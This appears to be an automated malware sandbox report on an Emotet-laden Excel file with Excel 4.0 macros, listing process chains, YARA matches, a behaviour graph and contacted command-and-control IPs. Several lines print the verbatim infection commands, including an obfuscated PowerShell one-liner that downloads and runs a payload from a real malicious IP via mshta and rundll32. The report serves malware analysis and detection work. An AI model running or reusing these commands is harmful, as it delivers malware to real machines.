Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Loacxlk\dndx.ncb",UulABsIFcNr Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Loacxlk\dndx.ncb",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wjrjy\iojmtizxks.ova",ntwFGKOXv Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wjrjy\iojmtizxks.ova",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Htryahunxvozuf\xwruyhjnwpwdsh.vgm",AsDMHz Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Htryahunxvozuf\xwruyhjnwpwdsh.vgm",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: 2022-28-01_1203.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\2022-28-01_1203.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 12.2.rundll32.exe.900000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.450000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26c0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2380000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3130000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.450000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.870000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26f0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.20d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8d0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2390000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2460000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30a0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2470000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.270000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.900000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.510000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2950000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2460000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.490000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4e0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.270000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2690000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2490000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2500000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2920000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2690000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2330000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2310000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ee0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.510000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26f0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2f80000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a60000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2500000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.420000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2380000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ad0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.20d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2920000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2580000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2390000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f70000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ad0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ee0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e20000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.628239450.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579516462.0000000002F81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578753492.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579573149.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628717414.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666105711.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531281525.0000000002690000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628962814.0000000002380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579450603.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.530998249.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.584387125.0000000000420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628740337.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531348991.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579018435.0000000000871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628605585.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579089142.0000000000900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578701099.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531651304.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.668076705.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.631192468.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531562196.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531472229.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665855129.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579042470.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665636604.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.533513954.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666036219.0000000002331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531316310.00000000026C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628359803.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629146934.0000000002581000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665505187.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578997040.0000000000510000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.584415832.0000000000451000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579200917.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628692129.0000000000451000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629306052.00000000030A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.584465351.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665779039.0000000000491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.534212368.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629101043.0000000002500000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579066307.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.485021946.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.533715209.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665569984.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629429951.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.631454730.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.484854789.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.631287272.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578974620.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531136750.0000000000511000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531180558.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666081220.0000000002460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579126400.0000000000A61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629384040.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531037998.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531419796.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579285287.0000000002390000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531598010.0000000002F71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629265921.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.484571312.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531211991.0000000002431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531504516.0000000002951000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.628188848.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.579247284.0000000002311000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.629054225.0000000002471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.531096953.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562523 Sample: 2022-28-01_1203.xls Startdate: 29/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 43 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 16 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\2022-28-01_1203.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.172, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 hostfeeling.com 164.90.147.135, 80 DIGITALOCEAN-ASNUS United States 23->57 59 jurnalpjf.lan.go.id 103.206.244.105, 49170, 80 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID Indonesia 23->59 45 C:\ProgramData\JooSee.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\SysWOW64\Loacxlk\dndx.ncb (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.154.133.20
 unknown France
12876 OnlineSASFR true
185.157.82.211
 unknown Poland
42927 S-NET-ASPL true
212.237.17.99
 unknown Italy
31034 ARUBA-ASNIT true
79.172.212.216
 unknown Hungary
61998 SZERVERPLEXHU true
110.232.117.186
 unknown Australia
56038 RACKCORP-APRackCorpAU true
173.214.173.220
 unknown United States
19318 IS-AS-1US true
212.24.98.99
 unknown Lithuania
62282 RACKRAYUABRakrejusLT true
138.185.72.26
 unknown Brazil
264343 EmpasoftLtdaMeBR true
178.63.25.185
 unknown Germany
24940 HETZNER-ASDE true
160.16.102.168
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP true
81.0.236.90
 unknown Czech Republic
15685 CASABLANCA-ASInternetCollocationProviderCZ true
103.75.201.2
 unknown Thailand
133496 CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH true
216.158.226.206
 unknown United States
19318 IS-AS-1US true
45.118.115.99
 unknown Indonesia
131717 IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID true
51.15.4.22
 unknown France
12876 OnlineSASFR true
159.89.230.105
 unknown United States
14061 DIGITALOCEAN-ASNUS true
162.214.50.39
 unknown United States
46606 UNIFIEDLAYER-AS-1US true
103.206.244.105
 jurnalpjf.lan.go.id Indonesia
131111 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID false
200.17.134.35
 unknown Brazil
1916 AssociacaoRedeNacionaldeEnsinoePesquisaBR true
217.182.143.207
 unknown France
16276 OVHFR true
107.182.225.142
 unknown United States
32780 HOSTINGSERVICES-INCUS true
51.38.71.0
 unknown France
16276 OVHFR true
45.118.135.203
 unknown Japan 63949 LINODE-APLinodeLLCUS true
50.116.54.215
 unknown United States
63949 LINODE-APLinodeLLCUS true
131.100.24.231
 unknown Brazil
61635 GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR true
46.55.222.11
 unknown Bulgaria
34841 BALCHIKNETBG true
41.76.108.46
 unknown South Africa
